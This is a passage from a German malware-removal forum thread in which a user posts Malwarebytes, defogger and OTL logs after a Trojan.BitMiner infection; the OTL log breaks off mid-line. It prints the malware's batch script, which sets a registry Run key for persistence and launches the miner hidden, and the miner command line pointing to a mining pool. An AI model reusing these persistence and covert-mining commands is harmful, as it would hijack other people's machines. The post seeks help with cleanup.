| |
| |||||||
Log-Analyse und Auswertung: Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe"Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
04.06.2013, 16:28
| #1 |
| |  Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Hallo, aufgefallen das etwas nicht stimmen könnte ist mir das erste mal, als nach einem Start von Windows 7 ein DOS Fenster mit der Titelleiste "C:\Windows\system32\cmd.exe" und als einzige Zeile im Fenster "Der Vorgang wurde erfolgreich ausgeführt" auftauchte. Malwarebytes Anti-Malware hat dann folgende Datei als infiziert befunden und unter Quarantäne gestellt: "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Hier das log von der Schnellsuche welche das als Ergebnis hatte: Code:
ATTFilter Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org
Datenbank Version: 913060202
Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421
02.06.2013 14:56:57
mbam-log-2013-06-02 (14-56-57).txt
Art des Suchlaufs: Quick-Scan
Durchsuchte Objekte: 220542
Laufzeit: 7 Minute(n), 40 Sekunde(n)
Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschl¸ssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 1
Infizierte Speicherprozesse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Speichermodule:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungsschl¸ssel:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungswerte:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateiobjekte der Registrierung:
(Keine bˆsartigen Objekte gefunden)
Infizierte Verzeichnisse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateien:
c:\Users\ant\AppData\Roaming\pejo\scvhost.exe (Trojan.BitMiner) -> Quarantined and deleted successfully.
Ein vollständiger Scan mit Malwarebytes ergab aber kein Ergebnis mehr: Code:
ATTFilter Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org
Datenbank Version: 913060202
Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421
02.06.2013 16:45:22
mbam-log-2013-06-02 (16-45-22).txt
Art des Suchlaufs: Vollst‰ndiger Suchlauf (C:\|)
Durchsuchte Objekte: 358343
Laufzeit: 1 Stunde(n), 21 Minute(n), 45 Sekunde(n)
Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschl¸ssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0
Infizierte Speicherprozesse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Speichermodule:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungsschl¸ssel:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungswerte:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateiobjekte der Registrierung:
(Keine bˆsartigen Objekte gefunden)
Infizierte Verzeichnisse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateien:
(Keine bˆsartigen Objekte gefunden)
*\pejo\vifier.bat: Code:
ATTFilter @echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v pejo /d "\"%appdata%\pejo\vifier.bat\"" /f
cd "%appdata%\pejo\"
chp cmd /c ""%appdata%\pejo\1.bat""
Code:
ATTFilter scvhost.exe -o hxxp://us1.eclipsemc.com:8337 -u melody_6 -p pavlaka -k diablo
Da die infizierte scvhost.exe in der 1.bat erwähnt wurde, nehme ich nun an dass dieses pejo-Verzeichnis was mit der ganzen Sachen zu tun hat... Hier die Liste der Dateien im Verzeichnis: Code:
ATTFilter 1.bat
API.class
chp.exe
diablo121016.cl
diakgcn121016.cl
libblkmaker-jansson-0.1-0.dll
libblkmaker-0.1-0.dll
libcurl-4.dll
libjansson-4.dll
libusb-1.0.dll
miner.php
pdcurses.dll
phatk121016.cl
poclbm121016.cl
pthreadGC2.dll
scrypt121016.cl
vifier.bat
zlib1.dll
defogger: Code:
ATTFilter defogger_disable by jpshortstuff (23.02.10.1)
Log created at 17:09 on 02/06/2013 (***)
Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.
Checking for services/drivers...
Unable to read sptd.sys
SPTD -> Disabled (Service running -> reboot required)
-=E.O.F=-
Code:
ATTFilter OTL logfile created on: 02.06.2013 17:24:00 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation Internet Explorer (Version = 9.0.8112.16421) Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy 3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free 6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT Computer Name: ANT-PC | User Name: ant | Logged in as Administrator. Boot Mode: Normal | Scan Mode: Current user | Quick Scan Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days ========== Processes (SafeList) ========== PRC - [2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe PRC - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) -- C:\Program Files\NetDrive\ndsvc.exe PRC - [2012.08.01 10:23:39 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe PRC - [2012.07.09 20:51:26 | 001,672,008 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyserver.exe PRC - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe PRC - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe PRC - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe PRC - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\sched.exe PRC - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe PRC - [2012.05.09 07:18:42 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avshadow.exe PRC - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe PRC - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE PRC - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe PRC - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe PRC - [2009.04.11 08:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe PRC - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eNet\eNet Service.exe PRC - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe PRC - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () -- C:\Acer\Mobility Center\MobilityService.exe PRC - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe PRC - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe PRC - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe PRC - [2007.09.07 21:35:10 | 000,102,400 | ---- | M] (Synaptics, Inc.) -- C:\Program Files\Synaptics\SynTP\SynTPStart.exe ========== Modules (No Company Name) ========== MOD - [2011.06.24 22:56:36 | 000,087,328 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll MOD - [2011.06.24 22:56:14 | 001,241,888 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll MOD - [2010.03.15 11:28:22 | 000,141,824 | ---- | M] () -- C:\Program Files\WinRAR\RarExt.dll MOD - [2008.03.10 08:01:06 | 000,159,744 | ---- | M] () -- C:\Windows\System32\atitmmxx.dll ========== Services (SafeList) ========== SRV - [2013.05.14 21:03:15 | 000,256,904 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc) SRV - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) [Auto | Running] -- C:\Program Files\NetDrive\ndsvc.exe -- (ndsvc) SRV - [2012.07.13 13:28:36 | 000,160,944 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate) SRV - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe -- (TwonkyProxy) SRV - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe -- (TwonkyWebDav) SRV - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe -- (TwonkyServer) SRV - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService) SRV - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService) SRV - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService) SRV - [2011.08.13 01:56:34 | 000,411,432 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files\Common Files\Steam\SteamService.exe -- (Steam Client Service) SRV - [2011.02.28 19:44:14 | 000,183,560 | ---- | M] (Microsoft Corporation.) [On_Demand | Stopped] -- C:\Program Files\Microsoft\BingBar\BBSvc.EXE -- (BBSvc) SRV - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE -- (SeaPort) SRV - [2011.01.26 18:00:16 | 000,284,672 | ---- | M] (Advanced Micro Devices, Inc.) [Auto | Stopped] -- C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe -- (AMD FUEL Service) SRV - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) [Auto | Running] -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe -- (AMD Reservation Manager) SRV - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe -- (AVerScheduleService) SRV - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe -- (AVerRemote) SRV - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eNet\eNet Service.exe -- (eNet Service) SRV - [2008.01.21 04:23:32 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) [Auto | Running] -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe -- (eDataSecurity Service) SRV - [2007.12.19 19:09:22 | 000,024,576 | ---- | M] () [Auto | Stopped] -- C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe -- (eSettingsService) SRV - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () [Auto | Running] -- C:\Acer\Mobility Center\MobilityService.exe -- (MobilityService) SRV - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe -- (eLockService) SRV - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) [Auto | Running] -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe -- (WMIService) SRV - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService) ========== Driver Services (SafeList) ========== DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd) DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt) DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp) DRV - [2013.03.06 15:43:15 | 000,048,352 | ---- | M] (Bdrive Inc.) [File_System | On_Demand | Running] -- C:\Program Files\NetDrive\NDFS.sys -- (ndfs) DRV - [2012.09.19 11:02:06 | 000,181,344 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudmdm.sys -- (ssudmdm) DRV - [2012.07.30 13:32:08 | 000,083,168 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudbus.sys -- (dg_ssudbus) DRV - [2012.05.09 07:18:43 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb) DRV - [2012.05.09 07:18:43 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt) DRV - [2011.10.19 17:56:15 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr) DRV - [2011.08.31 17:00:50 | 000,022,216 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\System32\drivers\mbam.sys -- (MBAMProtector) DRV - [2010.11.21 17:30:51 | 000,691,696 | ---- | M] (Duplex Secure Ltd.) [Kernel | Disabled | Stopped] -- C:\Windows\System32\drivers\sptd.sys -- (sptd) DRV - [2010.06.17 16:14:27 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv) DRV - [2010.02.18 09:18:22 | 000,037,944 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\amdiox86.sys -- (amdiox86) DRV - [2009.10.19 04:26:08 | 000,474,880 | ---- | M] (AVerMedia TECHNOLOGIES, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\AVerAF35.sys -- (AVerAF35) DRV - [2008.11.19 17:09:08 | 000,013,056 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\lgusbbus.sys -- (usbbus) DRV - [2008.03.10 08:58:40 | 003,533,824 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag) DRV - [2008.01.21 04:23:21 | 000,016,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSDPrint.sys -- (WSDPrintDevice) DRV - [2007.07.03 11:05:20 | 000,015,392 | ---- | M] (Acer, Inc.) [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15) DRV - [2007.04.03 20:04:28 | 000,039,680 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2media.sys -- (O2MDRDR) DRV - [2007.04.03 02:11:08 | 000,035,712 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2sd.sys -- (O2SDRDR) DRV - [2006.11.29 02:44:52 | 000,008,192 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio) DRV - [2006.10.30 21:23:12 | 000,007,680 | ---- | M] (ATI Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\AtiPcie.sys -- (AtiPcie) DRV - [2006.04.07 17:06:38 | 000,038,496 | ---- | M] (OLYMPUS IMAGING CORP.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VNUSB.sys -- (VNUSB) DRV - [2005.10.31 12:28:04 | 000,015,616 | ---- | M] (WideView Technology Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ECS_Loader_220.sys -- (ECS_Loader_220) ========== Standard Registry (SafeList) ========== ========== Internet Explorer ========== IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520 IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520 IE - HKLM\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64} IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.web.de/home IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://go.web.de/tab2 [binary data] IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchDefaultBranded = 1 IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 33 0B F0 16 3E C2 CA 01 [binary data] IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKCU\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64} IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC IE - HKCU\..\SearchScopes\{111F1281-BDAA-4B8D-9AF9-8BB376A8BDED}: "URL" = hxxp://www.bing.com/search?FORM=IEFM1&q={searchTerms}&src={referrer:source?} IE - HKCU\..\SearchScopes\{4A9BB00F-DA96-4E4D-A9CF-45117AB9D4D2}: "URL" = hxxp://go.web.de/suchbox/smartshopping/?searchText={searchTerms}&mc=searchplugin@suche@msie.suche@preisvergleich IE - HKCU\..\SearchScopes\{66227E65-9D58-4B37-87EC-09E6BF4C24AB}: "URL" = hxxp://go.web.de/suchbox/ebay?query={searchTerms} IE - HKCU\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://go.web.de/suchbox/google?q={searchTerms}&rlz=1I7ADRA_de IE - HKCU\..\SearchScopes\{84EE36C5-9201-46D0-A633-5CFCE7FF6552}: "URL" = hxxp://suche.gmx.net/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin IE - HKCU\..\SearchScopes\{96C8FC5C-438D-405E-BC5E-8F7F45AA3BCA}: "URL" = hxxp://go.1und1.de/suchbox/amazon?tag=1und1icon-21&field-keywords={searchTerms} IE - HKCU\..\SearchScopes\{ADDF20CC-BACE-48CB-A300-6C29BFE0E987}: "URL" = hxxp://suche.web.de/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin IE - HKCU\..\SearchScopes\{C1BF8F08-E17F-4955-840D-D97E1187C1D3}: "URL" = hxxp://de.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&type=971163&p={searchTerms} IE - HKCU\..\SearchScopes\{C821A797-ED91-43F3-A1FF-3BE6E0F679A4}: "URL" = hxxp://go.1und1.de/suchbox/1und1suche?su={searchTerms} IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local> ========== FireFox ========== FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll () FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.) FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.) FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeLive,version=1.5: C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.) FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2012.05.21 20:28:48 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins [2013.05.19 09:30:22 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{8A9386B4-E958-4c4c-ADF4-8F26DB3E4829}: C:\Program Files\PriceGong\2.6.11\FF [2013.05.15 20:53:03 | 000,000,000 | ---D | M] ========== Chrome ========== CHR - homepage: hxxp://www.google.com/ CHR - default_search_provider: Google (Enabled) CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding} CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms} CHR - homepage: hxxp://www.google.com/ CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\PepperFlash\pepflashplayer.dll CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\gcswf32.dll CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\ppGoogleNaClPluginChrome.dll CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\pdf.dll CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll CHR - plugin: Java Deployment Toolkit 6.0.210.7 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll CHR - plugin: Java(TM) Platform SE 6 U21 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL CHR - plugin: Microsoft Office Live Plug-in for Firefox (Enabled) = C:\Program Files\Microsoft\Office Live\npOLW.dll CHR - plugin: DivX Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll CHR - plugin: Picasa (Enabled) = C:\Program Files\Google\Picasa3\npPicasa3.dll CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll CHR - plugin: Windows Presentation Foundation (Enabled) = C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll O1 HOSTS File: ([2006.09.18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found. O2 - BHO: (PriceGong - Price Comparison) - {1631550F-191D-4826-B069-D9439253D926} - C:\Program Files\PriceGong\2.6.11\PriceGongIE.dll (PriceGong) O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found. O2 - BHO: (ShowBarObj Class) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - C:\Acer\Empowering 